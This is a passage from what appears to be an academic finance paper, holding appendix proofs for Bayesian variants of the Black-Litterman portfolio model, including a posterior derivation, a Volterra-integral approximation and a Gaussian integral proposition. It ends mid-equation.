"\n\nCurrent Work\n------------\n\nThe running time and memory allocation problems encountered when using the whole market would suggest that one has to reduce the dimensionality. ", "Moreover, there is a strong connection between the original Black-Litterman model and CAPM (which can be seen as a factor analysis model in statistics). ", "This gave us the idea of adding a fully Bayesian specified factor model to the Bayesian alternatives presented in this paper. ", "All the posteriors have already been derived for those.", "\n\n\\\nProof of Original Approach {#proof traditional}\n==========================\n\nAs we have seen, the original model is represented by the following $3$ distributions, where the last 2 are priors: $$\\begin{gathered}\nr \\sim N(\\mu,\\Sigma) \\\\\n\\mu \\sim N(\\pi,\\tau \\Sigma) \\\\\nq|\\mu \\sim N(P\\mu,\\Omega)\\end{gathered}$$\n\nThe last 2 equations are combined. ", "In order to get the joint likelihood , we would have to multiply the probability density functions of the last $2$ distributions:\n\n$$\\begin{aligned}\nf(\\mu,q) &\\propto exp \\left \\{ -\\frac{1}{2} \\left[ (\\mu-\\pi)^T (\\tau \\Sigma)^{-1}(\\mu -\\pi)+(q-P\\mu)^T\\Omega^{-1}(q-P\\mu)\\right] \\right \\}=\\\\\n&=exp\\left\\{-\\frac{1}{2} \n\\begin{bmatrix}\n\\mu-\\pi \\\\\nq-P\\mu \n\\end{bmatrix}^T\n\\begin{bmatrix}\n\\tau\\Sigma & 0\\\\\n0 & \\Omega\n\\end{bmatrix}^{-1}\n\\begin{bmatrix}\n\\mu-\\pi \\\\\nq-P\\mu \n\\end{bmatrix}\n\\right\\}\\end{aligned}$$\n\nLet $V=\\begin{bmatrix}\n\\tau\\Sigma & 0\\\\\n0 & \\Omega\n\\end{bmatrix}$ and $\\alpha=\\begin{bmatrix}\n\\mu-\\pi \\\\\nq-P\\mu \n\\end{bmatrix}$.\n\nWe will try to find a matrix $A$ such that when we compute $\\alpha'=A\\alpha$ and $V'=AVA^T$ we will obtain that the joint distribution from above is equal to $exp\\left \\{-\\frac{1}{2}\\alpha'^TV'^{-1}\\alpha'\\right \\}$.\n\nLet $$\\begin{aligned}\nA&=\n\\begin{bmatrix}\nI_n & -\\left((\\tau\\Sigma)^{-1}+P^T\\Omega^{-1}P \\right)^{-1}P^T\\Omega^{-1} \\\\\n0 & I_k\n\\end{bmatrix}\n\\begin{bmatrix}\nI_n & 0 \\\\\nP & I_k\n\\end{bmatrix}= \\\\\n&=\n\\begin{bmatrix}\nI_n-\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}P^T\\Omega^{-1}P & -\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}P^T\\Omega^{-1} \\\\\nP & I_k \n\\end{bmatrix}\\end{aligned}$$\n\nBut since $I_n=\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)$, we obtain that the first entry in the above matrix can be written as $$\\begin{gathered}\n\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1} \\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P-P^T\\Omega^{-1}P \\right)=\\\\\n\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}(\\tau\\Sigma)^{-1}\\end{gathered}$$\n\nHence, we can get the final form of $A$ is: $$\\begin{aligned}\nA=\n\\begin{bmatrix}\n\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}(\\tau\\Sigma)^{-1} & -\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}P^T\\Omega^{-1} \\\\\nP & I_k\n\\end{bmatrix}\\end{aligned}$$\n\n**Note**: $det(A)=1$. The determinant of a $2 \\times 2$ block matrix is computed using the same formula as that for a normal $2 \\times 2$ matrix, but we have to be careful when we look at the order in which we multiply: $$\\begin{aligned}\ndet(A)&=det\\{ \\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}(\\tau\\Sigma)^{-1}+ \\\\\n&+\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}P^T\\Omega^{-1}P\\}= \\\\\n&=det\\{\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\left( (\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)\\}=det(I)=1\\end{aligned}$$\n\nFinally, we are ready to find our $\\alpha'$ and $V'$: $$\\begin{gathered}\n\\alpha'=A\\alpha=A\\begin{bmatrix} \\mu-\\pi \\\\q-P\\mu\\end{bmatrix}= \\\\\n\\begin{bmatrix}\n\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1} (\\tau\\Sigma)^{-1}(\\mu-\\pi)-\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}P^T\\Omega^{-1}(q-P\\mu)\\\\\nP\\mu-P\\pi+q-P\\mu\n\\end{bmatrix}\\end{gathered}$$\n\nNow by factoring the common term in the $1^{st}$ entry of the vector, we obtain:\n\n$$\\begin{gathered}\n\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\left( (\\tau\\Sigma)^{-1}\\mu-(\\tau\\Sigma)^{-1}\\pi-P^T\\Omega^{-1}q+P^T\\Omega^{-1}P\\mu\\right)=\\\\\n=\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\left[ \\left((\\tau\\Sigma)^{-1}+P^T\\Omega^{-1}P\\right)\\mu -(\\tau\\Sigma)^{-1}\\pi-P^T\\Omega^{-1}q\\right]=\\\\\n=\\mu- \\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\left( (\\tau\\Sigma)^{-1}\\pi+P^T\\Omega^{-1}q \\right)\\end{gathered}$$\n\nAnd if we let $\\bar{\\mu}=\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\left( (\\tau\\Sigma)^{-1}\\pi+P^T\\Omega^{-1}q \\right)$, we obtain that $$\\label{eq:1}\n\\alpha'=A\\alpha=\\begin{bmatrix} \n\\mu-\\bar{\\mu} \\\\\nq-P\\pi\n\\end{bmatrix}$$\n\nNow we are ready to move to the computation of $V'$: $$\\begin{aligned}\nV'&=AVA^T=\\begin{bmatrix}\n\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1} & -\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}P^T \\\\\n\\tau P\\Sigma & \\Omega\n\\end{bmatrix}A^T\\\\\\end{aligned}$$\n\nAnd now, in order to compute $A^T$ we can use the fact that for any 2 matrices $(AB)^T=B^TA^T$ and also the fact that $\\Sigma$ is symmetric, hence $\\Sigma^{-1}$ is also symmetric. ", "Moreover, the same reasoning can be done for $\\Omega$. Hence, $(P^T\\Omega^{-1}P)^T=P^T\\Omega^{-1}P$. Now if we look at the first entry first column in the $2x2$ block matrix, we notice that it is actually equal to $(\\tau\\Sigma)^{-1} \\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}$. Similarly the second row first column in the block matrix is actually $-\\Omega^{-1}P\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}$.\n\nFinally, we can compute $V'$. The first entry in the first column will be: $$\\begin{gathered}\n\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}(\\tau \\Sigma)^{-1}\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}+ \\\\\n+\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}P^T\\Omega^{-1}P\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}=\\\\\n=\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}=\\\\\n=\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\end{gathered}$$\n\nHence, the whole matrix $V'$ will be: $$\\begin{aligned}\nV'&=\\begin{bmatrix}\n\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1} & 0 \\\\\n0 & \\Omega+\\tau P \\Sigma P^T\n\\end{bmatrix} \\Rightarrow \\\\\n\\Rightarrow {V'}^{-1}&=\\begin{bmatrix}\n\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right) & 0 \\\\\n0 & (\\Omega+\\tau P \\Sigma P^T)^{-1}\n\\end{bmatrix}\\end{aligned}$$\n\nNow that we have both the $V'$ and $\\alpha'$, it is a lot easier to notice that the joint will be: $$\\begin{aligned}\nf(q,\\mu)&\\propto exp \\left \\{ -\\frac{1}{2}\\alpha^T V^{-1}\\alpha \\right \\}=exp \\left \\{ -\\frac{1}{2} \\alpha'^T A^{-T} A^T V'^{-1} AA^{-1}\\alpha' \\right \\}=\\\\\n&=exp \\left \\{ -\\frac{1}{2} \\alpha'^TV'^{-1}\\alpha' \\right \\}\\end{aligned}$$\n\nBut this is the kernel of a multivariate normal. ", "Also, from equation (\\[eq:1\\]) and from the above form of the matrix $V'$, we obtain that : $$\\begin{gathered}\n\\mu \\sim N\\left(\\bar{\\mu},\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\right), \\\\\n\\bar{\\mu}=\\left((\\tau\\Sigma)^{-1}+ P^T\\Omega^{-1}P \\right)^{-1}\\left( (\\tau\\Sigma)^{-1}\\pi+P^T\\Omega^{-1}q \\right)\\end{gathered}$$\n\nFurthermore, from this solution, we obtained that: $$\\begin{gathered}\nq\\sim N\\left( P\\pi, \\left(\\Omega+ P (\\tau\\Sigma) P^T\\right) \\right)\\end{gathered}$$\n\nIf we denote by $M^{-1}$ the covariance matrix and we take the above as been the new prior on the expected returns: $r|\\mu\\sim N(\\mu,\\Sigma)$, we obtain that the joint is:\n\n$$\\begin{aligned}\nf(r,\\mu)&\\propto exp \\left\\{ -\\frac{1}{2} \\left( (\\mu-\\bar{\\mu})^T M(\\mu-\\bar{\\mu}) + (r-\\mu)^T\\Sigma^{-1}(r-\\mu) \\right) \\right\\}= \\\\\n&= exp \\left\\{ -\\frac{1}{2} \\left( (\\mu-\\bar{\\mu})^T M(\\mu-\\bar{\\mu}) + (\\mu-r)^T\\Sigma^{-1}(\\mu-r) \\right) \\right\\}\\end{aligned}$$\n\nUsing lemma \\[lemma2\\] with $y=\\mu,a=\\bar{\\mu},b=r,A=M,B=\\Sigma^{-1}$, we can conclude that: $$\\begin{aligned}\nf(r,\\mu) &\\propto exp \\left\\lbrace -\\frac{1}{2}(\\mu-\\mu^*)^T(M+\\Sigma^{-1})(\\mu-\\mu^*)\\right\\rbrace\\cdot \\\\\n&\\cdot exp \\left\\lbrace (r-\\bar{\\mu})^T \\left(M^{-1}+\\left({\\Sigma^{-1}}\\right)^{-1}\\right)^{-1} (r-\\bar{\\mu}) \\right\\rbrace\\end{aligned}$$\n\nHence the posterior of the returns fallows also a normal distribution: $$\\begin{gathered}\nr\\sim N(\\bar{\\mu},M^{-1}+\\Sigma)\\end{gathered}$$\n\n\\\nProof of Approximation using Volterra Integrals {#approx proof}\n===============================================\n\nAs mentioned before, Bellman in his book *Introduction to Matrix Analysis* shows an even more general result than what we need. ", "The matrix exponential $x(t)=e^{(A_0+cB_0)t}$ satisfies the Volterra integral equation: $$\\begin{gathered}\nX(t)=e^{A_0t}+c\\int_{0}^{t}e^{A_0(t-s)}B_0X(s)ds, 0<t<\\infty\\end{gathered}$$\n\nNow if we let in the above equation $A_0=-\\Lambda$, $B_0=\\Lambda-A$, $c=1$ and remembering that $\\Lambda=log(S)$ we obtain: $$\\begin{gathered}\nX(t)={S}^{-t}-\\int_{0}^{t}S^{s-t}(A-\\Lambda)X(v)dv, 0<t<\\infty, \\end{gathered}$$\n\nSince we want to approximate $e^{-A}$, we let in the above equation $t=1$ and we repeatedly replace $X$: $$\\begin{gathered}\ne^{-A}=X(1)=S^{-1}-\\int_{0}^{1} S^{s-1}(A-\\Lambda)S^{-s}ds=\\\\\n=S^{-1} -\\int_{0}^{1}S^{s-1}(A-\\Lambda) \\left( S^{-s}-\\int_{0}^{s} S^{u-s}(A-\\lambda)X(u)du \\right)ds=\\\\\n=S^{-1}-\\int_{0}^{1} S^{s-1}(A-\\Lambda)S^{-s}ds+\\int_{0}^{1}\\int_{0}^{s}S^{s-1}(A-\\Lambda)S^{u-s}(A-\\Lambda)\\cdot \\\\\n\\cdot \\left( S^{-u}-\\int_{0}^{u} S^{v-u}(A-\\lambda)X(v)dv \\right) duds \\approx \\\\\n\\approx S^{-1}-\\int_{0}^{1} S^{s-1}(A-\\Lambda)S^{-s}ds+\\int_{0}^{1}\\int_{0}^{s}S^{s-1}(A-\\Lambda)S^{u-s}(A-\\Lambda)S^{-u}duds\\end{gathered}$$\n\nWhere this is an approximation because the triple and higher order integrals were ignored. ", "The conditional pdf of the returns is: $$\\begin{gathered}\nf(r_1,...,r_m|\\mu,\\Sigma)\\propto exp\\lbrace -\\frac{m}{2}Tr(A+Se^{-A}) \\rbrace\\end{gathered}$$\n\nHence, from the Volterra approximation, by multiplying by $S$ and taking the trace, we obtain: $$\\begin{gathered}\nTr(Se^{-A})\\approx n-\\int_{0}^{1} Tr\\left( S^s(A-\\Lambda)S^{-s} \\right)ds+ \\\\\n+\\int_{0}^{1}\\int_{0}^{s} Tr\\left( S^{s}(A-\\Lambda)S^{u-s}(A-\\Lambda)S^{-u}duds \\right)\\end{gathered}$$\n\nThe first integral is easier to compute: $$\\begin{gathered}\n\\int_{0}^{1} Tr\\left( S^s(A-\\Lambda)S^{-s} \\right)ds=\\int_{0}^{1} Tr\\left(A-\\Lambda \\right)ds=Tr\\left(A-\\Lambda \\right)\\end{gathered}$$\n\nThe second integral requires more calculations. ", "Before we delve into them, let us write the spectral decomposition of $S$ as $S=E_0D_0E_0^T$. If we define the matrix $log$ through the Taylor series expansion, and by suing the fact that $E_0$ is orthonormal, we obtain that the spectral decomposition of $log(S)$ is $\\Lambda=log(S)=E_0log(D_0)E_0^T$. Also, let us make another notation: $B=E_0^T(A-\\Lambda)E_0\\Rightarrow E_0BE_0^T=A-\\Lambda$: $$\\begin{gathered}\nTr \\left( S^s(A-\\Lambda)S^{u-s}(A-\\Lambda)S^{-u} \\right)=Tr \\left( (A-\\Lambda)S^{u-s}(A-\\Lambda)S^{-(u-s)} \\right)=\\\\\n=Tr \\left( E_0BD_0^{u-s}B D_0^{-(u-s)}E_0^T \\right)=Tr \\left( BD_0^{u-s}B D_0^{-(u-s)} \\right)\\end{gathered}$$\n\nIn order to compute the integral of this *Trace* term, we will try to put it in scalar form: $$\\begin{gathered}\nBD_0^{u-s}=\n\\begin{bmatrix}\nb_{11}d_{1}^{u-s} & b_{12}d_{2}^{u-s} & ... & b_{1n}d_{n}^{u-s} \\\\\n: & : & ... & :\\\\\nb_{n1}d_{1}^{u-s} & b_{12}d_{2}^{u-s} & ... & b_{1n}d_{n}^{u-s}\n\\end{bmatrix}\\end{gathered}$$\n\nFor the matrix $BD_0^{-(u-s)}$ we obtain a similar result, the only difference is that $d_{i}^{u-s}$ is replaced by $\\frac{1}{d_{i}^{u-s}}$. Also, from the spectral decomposition, please note that $d_{i}$ are the eigenvalues of $S$.\n\nSince we need the $Tr \\left( BD_0^{u-s}B D_0^{-(u-s)} \\right)$, we will only compute the diagonal entries of this matrix: $$\\begin{gathered}\ndiag \\left(BD_0^{u-s}BD_0^{-(u-s)} \\right)= \\\\\n\\begin{bmatrix}\nb_{11}^2+b_{12}b_{21}\\left( \\frac{d_{2}}{d_{1}} \\right)^{u-s}+b_{13}b_{31}\\left( \\frac{d_{3}}{d_{1}} \\right)^{u-s}+ \\cdots + b_{1n}b_{n1}\\left( \\frac{d_{n}}{d_{1}} \\right)^{u-s}\\\\\nb_{21}b_{12}\\left(\\frac{d_1}{d_2}\\right)^{u-s}+b_{22}^2+\\cdots + b_{2n}b_{n2}\\left(\\frac{d_n}{d_2}\\right)^{u-s} \\\\\n:\\\\\nb_{n1}b_{1n}\\left(\\frac{d_n}{d_1}\\right)^{u-s}+b_{n2}b_{2n}\\left(\\frac{d_n}{d_2}\\right)^{u-s}+\\cdots + b_{nn}^2\n\\end{bmatrix}\\end{gathered}$$\n\nBut we know that $B$ is symmetric. ", "Therefore, we obtain that: $$\\begin{gathered}\n\\int_0^1\\int_0^s Tr \\left( BD_0^{u-s}B D_0^{-(u-s)} \\right)duds= \\sum_{i=1}^{n} \\int_0^1\\int_0^s b_{ii}^2duds+ \\\\\n+\\sum_{i\\neq j}^n \\int_0^1\\int_0^s b_{ij}^2\\left(\\frac{d_i}{d_j}\\right)^{u-s} duds \\text{, where we have that}\\\\\n\\sum_{i=1}^{n}\\int_0^1\\int_0^s b_{ii}^2duds=\\sum_{i=1}^{n}\\frac{b_{ii}^2}{2} \\text{ and also}\\\\\n\\sum_{i\\neq j}^n \\int_0^1\\int_0^s b_{ij}^2\\left(\\frac{d_i}{d_j}\\right)^{u-s} duds= \\sum_{i\\neq j}^n \\int_0^1 b_{ij}^2\\left(\\frac{d_i}{d_j}\\right)^{u-s} \\cdot \\\\\n\\cdot \\frac{1}{\\log(d_i)-\\log(d_j)}\\Big|_0^sds=\n\\sum_{i\\neq j} \\frac{b_{ij}^2}{\\log(d_i)-\\log(d_j)}\\int_0^1 1-\\left( \\frac{d_i}{d_j} \\right)^{-s}ds=\\\\\n=\\sum_{i\\neq j} \\frac{b_{ij}^2}{\\log(d_i)-\\log(d_j)} \\left( 1-\\left(\\frac{d_j}{d_i} \\right)^s \\frac{1}{\\log(d_j)-\\log(d_i)} \\right)\\Big|_0^1=\\\\\n=\\sum_{i\\neq j} \\frac{b_{ij}^2}{\\log(d_i)-\\log(d_j)} + \\sum_{i \\neq j} b_{ij}^2\\frac{\\frac{d_j}{d_i}-1}{(\\log(d_i)-\\log(d_j))^2}=\\\\\n=\\sum_{i< j} \\left( \\frac{b_{ij}^2}{\\log(d_i)-\\log(d_j)} + \\frac{b_{ji}^2}{\\log(d_j)-\\log(d_i)} \\right) + \\sum_{i<j} b_{ij}^2\\frac{\\frac{d_j}{d_i}+\\frac{d_i}{d_j}-2}{(\\log(d_i)-\\log(d_j))^2}=\\\\\n=0+\\sum_{i<j} b_{ij}^2\\frac{\\frac{d_j}{d_i}+\\frac{d_i}{d_j}-2}{(\\log(d_i)-\\log(d_j))^2}\\end{gathered}$$ Finally, by adding the two double integrals, we obtain that $$\\begin{gathered}\n\\int_0^1\\int_0^s Tr \\left( BD_0^{u-s}B D_0^{-(u-s)} \\right)duds=n-Tr(A)+Tr(\\Lambda)+\\\\\n+\\frac{1}{2}\\sum_{i=0}^n b_{ii}^2+\\sum_{i<j} b_{ij}^2\\frac{\\frac{d_j}{d_i}+\\frac{d_i}{d_j}-2}{(\\log(d_i)-\\log(d_j))^2}\\end{gathered}$$ With the notation of the $\\xi_{ij}$ introduced in the paper, we obtain the Volterra approximation represented by equation (\\[approx dist\\]).", "\n\n\\\nProof of Proposition \\[integral proposition\\] {#integral proof}\n=============================================\n\nThe following equality holds: $$\\begin{gathered}\nf(\\alpha|\\sigma_1^2,\\sigma_2^2)=\\int_\\theta det(\\Delta)^{-\\frac{1}{2}}exp\\left\\lbrace -\\frac{1}{2}(\\alpha-J\\theta)^T \\Delta^{-1}(\\alpha-J\\theta) \\right\\rbrace d\\theta=\\\\\n=2\\pi det(\\Delta)^{-\\frac{1}{2}}det(J^T\\Delta^{-1}J)^{-\\frac{1}{2}}exp \\left\\lbrace -\\frac{1}{2}\\alpha^TG\\alpha \\right\\rbrace \\text{, where} \\\\\nG=\\left(I_d-J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}\\right)^T\\Delta^{-1}\\left(I_d-J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}\\right)\\end{gathered}$$\n\nBefore we actually attempt to compute the integral, we would like to put all the quantities in scalar form since this would make our life easier. ", "This brings us to the following two lemmas:\n\n\\[determinants identity\\] $det(\\Delta)^{-\\frac{1}{2}}det(J^T\\Delta^{-1}J)^{-\\frac{1}{2}}=\\frac{1}{\\sqrt{n(d-n)}}\\left( \\sigma_1^2 \\right)^{-\\frac{n-1}{2}}\\left( \\sigma_2^2 \\right)^{-\\frac{d-n-1}{2}}$\n\n$$\\begin{gathered}\nJ^T\\Delta^{-1}J=\\begin{bmatrix}\n\\frac{1}{\\sigma_1^2}&...&\\frac{1}{\\sigma_1^2}&0&...&0\\\\\n0&...&0&\\frac{1}{\\sigma_2^2}&...&\\frac{1}{\\sigma_2^2}\n\\end{bmatrix}J=\\begin{bmatrix}\n\\frac{n}{\\sigma_1^2}&0\\\\\n0&\\frac{d-n}{\\sigma_2^2}\n\\end{bmatrix}\\end{gathered}$$\n\nHence, we obtain that $det(J^T\\Delta^{-1}J)^{-\\frac{1}{2}}=\\frac{1}{\\sqrt{n(d-n)}}\\left( \\sigma_1^2 \\right)^{\\frac{1}{2}}\\left( \\sigma_2^2 \\right)^{\\frac{1}{2}}$ Also, clearly since $\\Delta$ is diagonal, we obtain that: $$\\begin{gathered}\ndet(\\Delta)^{-\\frac{1}{2}}=\\left( \\sigma_1^2 \\right)^{-\\frac{n}{2}} \\left( \\sigma_2^2 \\right)^{-\\frac{d-n}{2}}\\end{gathered}$$ Multiplying the two determinants, we obtain the desired result.", "\n\nNow let us turn our attention to writing in scalar form the term in the exponential:\n\n\\[exponential identity\\] $\\alpha^TG\\alpha=\\frac{1}{\\sigma_1^2}\\sum_{i=1}^{n} (\\alpha_i-\\overline{\\alpha_v})^2+\\frac{1}{\\sigma_2^2}\\sum_{i=n+1}^{d} (\\alpha_i-\\overline{\\alpha_c})^2$, where $\\overline{\\alpha_v}$ is the average of the $\\alpha's$ on the main diagonal (i.e. those that originate from the log of the variance terms of the returns) and $\\overline{\\alpha_c}$ is the average of all the $\\alpha$’s that are on the off diagonal (i.e. those that originate from the log of the covariance terms of the returns).", "\n\nFirst of all, one can notice that the formula for $G$ can be simplified for calculation purposes: $$\\begin{gathered}\nG=\\left(I_d-J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}\\right)^T\\Delta^{-1}\\left(I_d-J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}\\right)=\\\\\n=\\Delta^{-1}-\\Delta^{-1}J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}-\\Delta^{-1}J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}+\\\\\n+\\Delta^{-1}J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}=\\Delta^{-1}-\\Delta^{-1}J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}\\end{gathered}$$ We remember that we have computed $J^T\\Delta^{-1}J$ in lemma \\[determinants identity\\]: $$\\begin{gathered}\nJ^T\\Delta^{-1}J=\\begin{bmatrix}\n\\frac{n}{\\sigma_1^2}&0\\\\\n0&\\frac{d-n}{\\sigma_2^2}\n\\end{bmatrix} \\text{ and }\n\\Delta^{-1}J=\\begin{bmatrix}\n\\frac{1}{\\sigma_1^2}&0\\\\\n:&:\\\\\n\\frac{1}{\\sigma_1^2}&0\\\\\n0&\\frac{1}{\\sigma_2^2}\\\\\n:&:\\\\\n0&\\frac{1}{\\sigma_2^2}\n\\end{bmatrix} \\Rightarrow \\\\\n\\Rightarrow \\Delta^{-1}J\\left( J^T\\Delta^{-1}J \\right)=\\begin{bmatrix}\n\\frac{1}{n}&0\\\\\n:&:\\\\\n\\frac{1}{n}&0\\\\\n0&\\frac{1}{d-n}\\\\\n:&:\\\\\n0&\\frac{1}{d-n}\n\\end{bmatrix}\\Rightarrow \\\\\n\\Rightarrow \\Delta^{-1}J\\left( J^T\\Delta^{-1}J \\right)J^T\\Delta^{-1}=\\begin{bmatrix}\n\\frac{1}{n\\sigma_1^2}&...&\\frac{1}{n\\sigma_1^2}&0&...&0\\\\\n:&...&:&:&...&:\\\\\n\\frac{1}{n\\sigma_1^2}&...&\\frac{1}{n\\sigma_1^2}&0&...&0\\\\\n0&...&0&\\frac{1}{(d-n)\\sigma_2^2}&...&\\frac{1}{(d-n)\\sigma_2^2}\\\\\n:&...&:&:&...&:\\\\\n0&...&0&\\frac{1}{(d-n)\\sigma_2^2}&...&\\frac{1}{(d-n)\\sigma_2^2}\n\\end{bmatrix}\\end{gathered}$$ Now we just have to subtract this matrix from $\\Delta^{-1}$, which is just diagonal, and we can finally compute the desired quantity: $$\\begin{gathered}\n\\alpha^TG\\alpha=\\sum_{1\\leq i\\neq j\\leq n}\\frac{1}{n\\sigma_1^2}\\alpha_i\\alpha_j+\\sum_{i=1}^n\\frac{n-1}{n\\sigma_1^2}\\alpha_i^2+\\sum_{n+1\\leq i\\neq j\\leq d} \\frac{1}{(d-n)\\sigma_2^2}\\alpha_i\\alpha_j+\\\\\n+\\sum_{i=n+1}^d \\frac{d-n-1}{(d-n)\\sigma_2^2}\\alpha_i^2\\end{gathered}$$ By looking at this equation and the one that we have to prove, we realize that if we would manage to show the following identity, we would also prove the lemma: $$\\begin{gathered}\n\\sum_{1\\leq i\\neq j\\leq n}\\frac{1}{n\\sigma_1^2}\\alpha_i\\alpha_j+\\sum_{i=1}^n\\frac{n-1}{n\\sigma_1^2}\\alpha_i^2=\\frac{1}{\\sigma_1^2}\\sum_{i=1}^{n} (\\alpha_i-\\overline{\\alpha_v})^2\\end{gathered}$$ Let us start from the right hand side: $$\\begin{gathered}\n\\sum_{i=1}^{n} (\\alpha_i-\\overline{\\alpha_v})^2=\\sum_{i=1}^n \\alpha_i^2-n\\overline{\\alpha}^2=\\sum_{i=1}^n \\alpha_i^2-\\frac{1}{n}\\left( \\sum_{i=1}^n \\alpha_i \\right)^2=\\\\\n=\\sum_{i=1}^n \\alpha_i^2 -\\frac{1}{n}\\sum_{i=1}^n\\alpha_i^2-\\frac{1}{n}\\sum_{i\\neq j}\\alpha_i\\alpha_j=\\sum_{i=1}^n\\frac{n-1}{n}\\alpha_i^2-\\frac{1}{n}\\sum_{i\\neq j}\\alpha_i\\alpha_j\\end{gathered}$$\n\nNow we finally have all the necessary identities to write the integral in our proposition in scalar form. ", "We would have to prove that:\n\n$$\\begin{gathered}\n\\int_{\\theta_1} exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^n (\\alpha_i-\\theta_1)^2 \\right\\rbrace d\\theta_1 \\int_{\\theta_2} exp \\left\\lbrace -\\frac{1}{2\\sigma_2^2} \\sum_{i=n+1}^q (\\alpha_i-\\theta_2)^2 \\right\\rbrace d\\theta_2=\\\\\n=2\\pi \\frac{\\sigma_1}{\\sqrt{n}}exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^{n} (\\alpha_i-\\overline{\\alpha_v})^2 \\right\\rbrace \\frac{\\sigma_2}{\\sqrt{d-n}} exp \\left\\lbrace -\\frac{1}{2\\sigma_2^2} \\sum_{i=n+1}^{q} (\\alpha_i-\\overline{\\alpha_c})^2 \\right\\rbrace\\end{gathered}$$\n\nHence, if we manage to show the following identity, we would manage to prove the proposition also: $$\\begin{gathered}\n\\int_{\\theta_1} exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^n (\\alpha_i-\\theta_1)^2 \\right\\rbrace d\\theta_1=\\sqrt{2\\pi} \\frac{\\sigma_1}{\\sqrt{n}}exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^{n} (\\alpha_i-\\overline{\\alpha_v})^2 \\right\\rbrace\\end{gathered}$$\n\nLet us start from the left hand side and subtract and add the average $\\overline{\\alpha_v}$ in each term of the sum from the exponential: $$\\begin{gathered}\nLHS=\\int_{\\theta_1} exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^n (\\alpha_i-\\theta_1)^2 \\right\\rbrace d\\theta_1=\\\\\n=\\int_{\\theta_1} exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^n (\\alpha_i-\\overline{\\alpha_v}+\\overline{\\alpha_v}-\\theta_1)^2 \\right\\rbrace d\\theta_1=\\\\\n=exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^n (\\alpha_i-\\overline{\\alpha_v})^2 \\right\\rbrace \\cdot \\\\\n\\cdot \\int_{\\theta_1} exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\left( \\sum_{i=1}^n(\\overline{\\alpha_v}-\\theta_1)^2 + 2\\sum_{i=1}^n (\\alpha_i-\\overline{\\alpha_v})(\\overline{\\alpha_v}-\\theta_1) \\right) \\right\\rbrace d\\theta_1=\\\\\n=exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^n (\\alpha_i-\\overline{\\alpha_v})^2 \\right\\rbrace \\cdot \\\\ \n\\cdot\\int_{\\theta_1} exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\left( n(\\overline{\\alpha_v}-\\theta_1)^2 + 2(\\overline{\\alpha_v}-\\theta_1)\\sum_{i=1}^n (\\alpha_i-\\overline{\\alpha_v})\\right) \\right\\rbrace d\\theta_1=\\\\\n=exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^n (\\alpha_i-\\overline{\\alpha_v})^2 \\right\\rbrace \\int_{\\theta_1} exp \\left\\lbrace 